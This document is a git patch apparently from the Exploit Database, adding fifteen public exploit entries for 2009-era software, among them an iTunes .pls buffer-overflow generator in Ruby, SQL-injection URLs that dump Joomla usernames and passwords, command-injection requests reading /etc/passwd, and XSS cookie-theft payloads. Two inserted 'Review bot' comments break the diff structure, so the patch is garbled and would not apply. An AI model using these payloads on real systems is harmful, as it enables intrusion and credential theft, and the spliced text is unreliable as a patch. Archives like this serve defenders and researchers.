From b20d2a307448e730f85cd6f9483cfe2daaf67d14 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 9 May 2014 04:36:24 +0000
Subject: [PATCH] Updated 05_09_2014
---
 files.csv | 15 ++++++++
 platforms/asp/webapps/33236.txt | 7 ++++
 platforms/bsd/local/33229.c | 31 +++++++++++++++
 platforms/cgi/webapps/33231.txt | 27 ++++++++++++++
 platforms/hardware/remote/33234.txt | 35 +++++++++++++++++
 platforms/linux/dos/33230.txt | 12 ++++++
 platforms/linux/dos/33233.txt | 10 +++++
 platforms/linux/local/33228.txt | 9 +++++
 platforms/osx/dos/33235.rb | 58 +++++++++++++++++++++++++++++
 platforms/php/webapps/33232.txt | 12 ++++++
 platforms/php/webapps/33237.txt | 9 +++++
 platforms/php/webapps/33238.txt | 7 ++++
 platforms/php/webapps/33239.txt | 11 ++++++
 platforms/php/webapps/33240.txt | 8 ++++
 platforms/php/webapps/33241.txt | 7 ++++
 platforms/php/webapps/33242.txt | 8 ++++
 16 files changed, 266 insertions(+)
 create mode 100755 platforms/asp/webapps/33236.txt
 create mode 100755 platforms/bsd/local/33229.c
 create mode 100755 platforms/cgi/webapps/33231.txt
 create mode 100755 platforms/hardware/remote/33234.txt
 create mode 100755 platforms/linux/dos/33230.txt
 create mode 100755 platforms/linux/dos/33233.txt
 create mode 100755 platforms/linux/local/33228.txt
 create mode 100755 platforms/osx/dos/33235.rb
 create mode 100755 platforms/php/webapps/33232.txt
 create mode 100755 platforms/php/webapps/33237.txt
 create mode 100755 platforms/php/webapps/33238.txt
 create mode 100755 platforms/php/webapps/33239.txt
 create mode 100755 platforms/php/webapps/33240.txt
 create mode 100755 platforms/php/webapps/33241.txt
 create mode 100755 platforms/php/webapps/33242.txt
diff --git a/files.csv b/files.csv
index 113b4dd0d..151e812c9 100755
--- a/files.csv
+++ b/files.csv
@@ -29953,3 +29953,18 @@ id,file,description,date,author,platform,type,port
 33225,platforms/windows/dos/33225.html,"EasyMail Objects 6.0.2.0 'emimap4.dll' ActiveX Control Remote Code Execution Vulnerability",2009-09-15,"Francis Provencher",windows,dos,0
 33226,platforms/php/webapps/33226.txt,"Mega File Hosting Script 1.2 'emaillinks.php' Cross Site Scripting Vulnerability",2009-09-16,Moudi,php,webapps,0
 33227,platforms/php/webapps/33227.txt,"TuttoPHP Morris Guestbook 'view.php' Cross Site Scripting Vulnerability",2009-09-16,Moudi,php,webapps,0
+33228,platforms/linux/local/33228.txt,"Linux Kernel 2.6.31 - 'perf_counter_open()' Local Buffer Overflow Vulnerability",2009-09-16,"Xiao Guangrong",linux,local,0
+33229,platforms/bsd/local/33229.c,"NetBSD <= 5.0.1 'IRET' General Protection Fault Handling Local Privilege Escalation Vulnerability",2009-09-16,"Tavis Ormandy",bsd,local,0
+33230,platforms/linux/dos/33230.txt,"GNU glibc 2.x 'strfmon()' Function Integer Overflow Weakness",2009-09-17,"Maksymilian Arciemowicz",linux,dos,0
+33231,platforms/cgi/webapps/33231.txt,"Avaya Intuity Audix LX R1.1 Multiple Remote Vulnerabilities",2009-09-18,pagvac,cgi,webapps,0
+33232,platforms/php/webapps/33232.txt,"MyBB 1.4.8 'search.php' SQL Injection Vulnerability",2009-09-19,$qL_DoCt0r,php,webapps,0
+33233,platforms/linux/dos/33233.txt,"FFmpeg Version 0.5 - Multiple Remote Vulnerabilities",2009-09-21,"Will Dormann",linux,dos,0
+33234,platforms/hardware/remote/33234.txt,"Check Point Connectra R62 '/Login/Login' Arbitrary Script Injection Vulnerability",2009-09-21,"Stefan Friedli",hardware,remote,0
+33235,platforms/osx/dos/33235.rb,"Apple iTunes <= 9.0 '.pls' File Buffer Overflow Vulnerability",2009-09-22,"Roger Hart",osx,dos,0
+33236,platforms/asp/webapps/33236.txt,"MaxWebPortal 1.365 'forum.asp' SQL Injection Vulnerability",2009-09-22,OoN_Boy,asp,webapps,0
+33237,platforms/php/webapps/33237.txt,"Joomla! 
SportFusion 0.2.x Component SQL Injection Vulnerability",2009-09-22,kaMtiEz,php,webapps,0
+33238,platforms/php/webapps/33238.txt,"Joomla! JoomlaFacebook Component SQL Injection Vulnerability",2009-09-22,kaMtiEz,php,webapps,0
+33239,platforms/php/webapps/33239.txt,"Vastal I-Tech Cosmetics Zone 'view_products.php' SQL Injection Vulnerability",2009-09-22,OoN_Boy,php,webapps,0
+33240,platforms/php/webapps/33240.txt,"Vastal I-Tech DVD Zone view_mag.php mag_id Parameter SQL Injection",2009-09-22,OoN_Boy,php,webapps,0
+33241,platforms/php/webapps/33241.txt,"Vastal I-Tech DVD Zone view_mag.php mag_id Parameter XSS",2009-09-22,OoN_Boy,php,webapps,0
+33242,platforms/php/webapps/33242.txt,"Vastal I-Tech Agent Zone SQL Injection Vulnerability",2009-09-23,OoN_Boy,php,webapps,0
diff --git a/platforms/asp/webapps/33236.txt b/platforms/asp/webapps/33236.txt
new file mode 100755
index 000000000..12e1acc37
--- /dev/null
+++ b/platforms/asp/webapps/33236.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/36480/info
+
+MaxWebPortal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/forum.asp?FORUM_ID=42&CAT_ID=7+and+1=convert%28int,@@version%29--
\ No newline at end of file
diff --git a/platforms/bsd/local/33229.c b/platforms/bsd/local/33229.c
new file mode 100755
index 000000000..330aea366
--- /dev/null
+++ b/platforms/bsd/local/33229.c
@@ -0,0 +1,31 @@
+source: http://www.securityfocus.com/bid/36430/info
+
+NetBSD is prone to a local privilege-escalation vulnerability.
+
+A local attacker may exploit this issue to cause the kernel stack to become desynchronized. This may allow the attacker to gain elevated privileges or may aid in further attacks.
+
+/* ... */
+int main(int argc, char **argv)
+{
+ jmp_buf env;
+
+ void handlesig(int n) {
+ longjmp(env, 1);
+
+ }
+ signal(SIGSEGV, handlesig);
+
+ if (setjmp(env) == 0) {
+ ( (void(*)(void)) NULL) ();
+ }
+
+ return 0;
+}
+
+/* ... */
+int main(int argc, char **argv)
+{
+ char baguette;
+ signal(SIGABRT, (void (*)(int))&baguette);
+ abort();
+}
diff --git a/platforms/cgi/webapps/33231.txt b/platforms/cgi/webapps/33231.txt
new file mode 100755
index 000000000..5a807a0ea
--- /dev/null
+++ b/platforms/cgi/webapps/33231.txt
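Review bot: The hunk holds two separate `main` definitions, each introduced by a `/* ... */` elision marker and with no `#include` lines, so the file is a pair of excerpts rather than one translation unit; a header comment should say so and label which fragment belongs to which of the two crash triggers it illustrates. `handlesig` is a GCC nested function that captures `env`, which is not standard C; because its address is passed to `signal`, GCC has to emit a stack trampoline and links the binary with an executable stack, a hardening regression that deserves a comment at its definition. `longjmp` is also not async-signal-safe, so what the first fragment does after the fault is undefined by the language standard and is entirely a property of the platform's fault handling, which is the point the advisory text above it is making and should be stated next to the code.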
@@ -0,0 +1,27 @@
+source: http://www.securityfocus.com/bid/36450/info
+
+Avaya Intuity Audix LX is prone to multiple remote vulnerabilities, including:
+
+1. Multiple remote command-execution vulnerabilities
+2. A cross-site request-forgery vulnerability
+3. A cross-site scripting vulnerability
+
+Attackers can exploit these issues to execute arbitrary commands with the privileges of 'vexvm' on the underlying system, steal cookie-based authentication credentials, execute arbitrary script code, and perform administrative tasks. Other attacks are also possible.
+
+POST /cswebadm/diag/cgi-bin/sendrec.pl HTTP/1.1
+ipadd=127.0.0.1;cat+/etc/passwd&count_p=1&size_p=56
+
+POST https://www.example.com/cswebadm/diag/cgi-bin/sendrec.pl HTTP/1.1
+ipadd=;cat+/etc/passwd
+
+POST /cswebadm/diag/cgi-bin/sendrec.pl HTTP/1.1
+ipadd=&count_p=1;ls&size_p=56
+
+POST /cswebadm/diag/cgi-bin/sendrec.pl HTTP/1.1
+ipadd=&count_p=1&size_p=56&opt_n=;ls
+
+POST /cswebadm/diag/cgi-bin/nslookup.pl HTTP/1.1
+host_or_ip=127.0.0.1&r_type=;ls;
+
+https://www.example.com/cgi-bin/smallmenu.pl?url=%3C/
+title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
\ No newline at end of file
diff --git a/platforms/hardware/remote/33234.txt b/platforms/hardware/remote/33234.txt
new file mode 100755
index 000000000..e2c0cf00a
--- /dev/null
+++ b/platforms/hardware/remote/33234.txt
@@ -0,0 +1,35 @@
+source: http://www.securityfocus.com/bid/36466/info
+
+Check Point Connectra is prone to an arbitrary-script-injection vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this issue to execute arbitrary script code in the context of the webserver. Successful exploits can compromise the application.
+
+--- CUT ---
+POST https://www.example.com:443/Login/Login HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2)
+Gecko/20090729 Firefox/3.5.2
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-us,en;q=0.5
+Accept-Encoding: gzip,deflate
+Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+Keep-Alive: 300
+Connection: keep-alive
+Referer: https://www.example.com/Login/Login?LangCode=
+Cookie: CheckCookieSupport=1; ICSCookie=***purged***; user_locale=en_US
+Content-Type: application/x-www-form-urlencoded
+Content-length: 153
+
+loginType=Standard&userName=&vpid_prefix=">
+--- CUT END ---
diff --git a/platforms/linux/dos/33230.txt b/platforms/linux/dos/33230.txt
new file mode 100755
index 000000000..383bb842b
--- /dev/null
+++ b/platforms/linux/dos/33230.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/36443/info
+
+GNU glibc is prone to an integer-overflow weakness.
+
+An attacker can exploit this issue through other applications such as PHP to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
+
+GNU glibc 2.10.1 and prior are vulnerable.
+
+The following proof-of-concept commands are available:
+
+php -r 'money_format("%.1073741821i",1);'
+php -r 'money_format("%.1343741821i",1);'
\ No newline at end of file
diff --git a/platforms/linux/dos/33233.txt b/platforms/linux/dos/33233.txt
new file mode 100755
index 000000000..17965be9d
--- /dev/null
+++ b/platforms/linux/dos/33233.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/36465/info
+
+FFmpeg is prone to multiple remote vulnerabilities.
+
+Attackers may leverage these issues to execute arbitrary code in the context of the application or crash the application.
+
+FFmpeg 0.5 is affected; other versions may also be vulnerable.
+
+http://www.exploit-db.com/sploits/33233-1.zip
+http://www.exploit-db.com/sploits/33233-2.zip
\ No newline at end of file
diff --git a/platforms/linux/local/33228.txt b/platforms/linux/local/33228.txt
new file mode 100755
index 000000000..65aed6505
--- /dev/null
+++ b/platforms/linux/local/33228.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36423/info
+
+The Linux kernel is prone to a local buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
+
+Local attackers may be able to exploit this issue to run arbitrary code with elevated privileges. Failed exploit attempts may crash the affected kernel, denying service to legitimate users.
+
+The Linux Kernel 2.6.31-rc1 through 2.6.31 are vulnerable.
+
+http://www.exploit-db.com/sploits/33228.tgz
\ No newline at end of file
diff --git a/platforms/osx/dos/33235.rb b/platforms/osx/dos/33235.rb
new file mode 100755
index 000000000..62df36014
--- /dev/null
+++ b/platforms/osx/dos/33235.rb
@@ -0,0 +1,58 @@
+source: http://www.securityfocus.com/bid/36478/info
+
+Apple iTunes is prone to a buffer-overflow vulnerability because the software fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.
+
+An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
+
+Versions prior to Apple iTunes 9.0.1 are vulnerable.
+
+#!/usr/bin/env ruby
+
+SETJMP = 0x92F04224
+JMP_BUF = 0x8fe31290
+STRDUP = 0x92EED110
+# 8fe24459 jmp *%eax
+JMP_EAX = 0x8fe24459
+
+def make_exec_payload_from_heap_stub()
+frag0 =
+"\x90" + # nop
+"\x58" + # pop eax
+"\x61" + # popa
+"\xc3" # ret
+frag1 =
+"\x90" + # nop
+"\x58" + # pop eax
+"\x89\xe0" + # mov eax, esp
+"\x83\xc0\x0c" + # add eax, byte +0xc
+"\x89\x44\x24\x08" + # mov [esp+0x8], eax
+"\xc3" # ret
+exec_payload_from_heap_stub =
+frag0 +
+[SETJMP, JMP_BUF + 32, JMP_BUF].pack("V3") +
+frag1 +
+"X" * 20 +
+[SETJMP, JMP_BUF + 24, JMP_BUF, STRDUP,
+JMP_EAX].pack("V5") +
+"X" * 4
+end
+
+payload_cmd = "hereisthetrick"
+stub = make_exec_payload_from_heap_stub()
+ext = "A" * 59
+stub = make_exec_payload_from_heap_stub()
+exploit = ext + stub + payload_cmd
+
+# pls file format
+
+file = "[playlist]\n"
+file += "NumberOfEntries=1\n"
+file += "File1=http://1/asdf." + exploit + "\n"
+file += "Title1=asdf\n"
+file += "Length1=100\n"
+file += "Version=2" + '\n'
+
+File.open('poc.pls','w') do |f|
+f.puts file
+f.close
+end
diff --git a/platforms/php/webapps/33232.txt b/platforms/php/webapps/33232.txt
new file mode 100755
index 000000000..d84d91050
--- /dev/null
+++ b/platforms/php/webapps/33232.txt
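Review bot: `stub = make_exec_payload_from_heap_stub()` is assigned twice, once before `ext = "A" * 59` and again right after it with no use in between, so the first assignment is dead and should be dropped. `f.close` inside the `File.open('poc.pls','w') do |f|` block is redundant, because the block form of `File.open` closes the handle when the block returns. The comment `# pls file format` would be more useful if it named what the following lines do, e.g. `# assemble the .pls playlist text that is written to poc.pls`.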
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/36460/info
+
+MyBB is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+MyBB 1.4.8 is vulnerable; other versions may also be affected.
+
+The following examples are available:
+
+simple query: ' or 1=1--
+blind query: ' having 1=1--
\ No newline at end of file
diff --git a/platforms/php/webapps/33237.txt b/platforms/php/webapps/33237.txt
new file mode 100755
index 000000000..cbc11b97b
--- /dev/null
+++ b/platforms/php/webapps/33237.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36481/info
+
+The SportFusion component ('com_sportfusion') for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+SportFusion 0.2.2 and 0.2.3 are affected; other versions may also be vulnerable.
+
+http://www.example.com/index.php?option=com_sportfusion&view=teamdetail&cid[0]=-666+union+select+1,2,3,4,5,concat(0x3a,username,password)kaMtiez,7,8,9,10,11,12,13+from+jos_users--
\ No newline at end of file
diff --git a/platforms/php/webapps/33238.txt b/platforms/php/webapps/33238.txt
new file mode 100755
index 000000000..775b2c2be
--- /dev/null
+++ b/platforms/php/webapps/33238.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/36484/info
+
+The JoomlaFacebook component ('com_facebook') for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.php?option=com_facebook&view=student&id=-666+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12+from+jos_users--
\ No newline at end of file
diff --git a/platforms/php/webapps/33239.txt b/platforms/php/webapps/33239.txt
new file mode 100755
index 000000000..6d379c749
--- /dev/null
+++ b/platforms/php/webapps/33239.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/36485/info
+
+Cosmetics Zone is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+The following URIs are available:
+
+http://www.example.com/cosmetics_zone/view_products.php?cat_id=5&sub_id=4+and+1=1-- True
+
+http://www.example.com/cosmetics_zone/view_products.php?cat_id=5&sub_id=4+and+1=2-- False
\ No newline at end of file
diff --git a/platforms/php/webapps/33240.txt b/platforms/php/webapps/33240.txt
new file mode 100755
index 000000000..ff6cab56c
--- /dev/null
+++ b/platforms/php/webapps/33240.txt
@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/36487/info
+
+DVD Zone is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/view_mag.php?mag_id=9+and+substring(@@version,1,1)=5 True
+http://www.example.com/view_mag.php?mag_id=9+and+substring(@@version,1,1)=4 False
\ No newline at end of file
diff --git a/platforms/php/webapps/33241.txt b/platforms/php/webapps/33241.txt
new file mode 100755
index 000000000..44a858829
--- /dev/null
+++ b/platforms/php/webapps/33241.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/36487/info
+
+DVD Zone is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/view_mag.php?mag_id=
\ No newline at end of file
diff --git a/platforms/php/webapps/33242.txt b/platforms/php/webapps/33242.txt
new file mode 100755
index 000000000..a4b62e879
--- /dev/null
+++ b/platforms/php/webapps/33242.txt
@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/36503/info
+
+Agent Zone is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/real/view_listing.php?id=4+and+substring(@@version,1,1)=5 True
+http://www.example.com/real/view_listing.php?id=4+and+substring(@@version,1,1)=4 False
\ No newline at end of file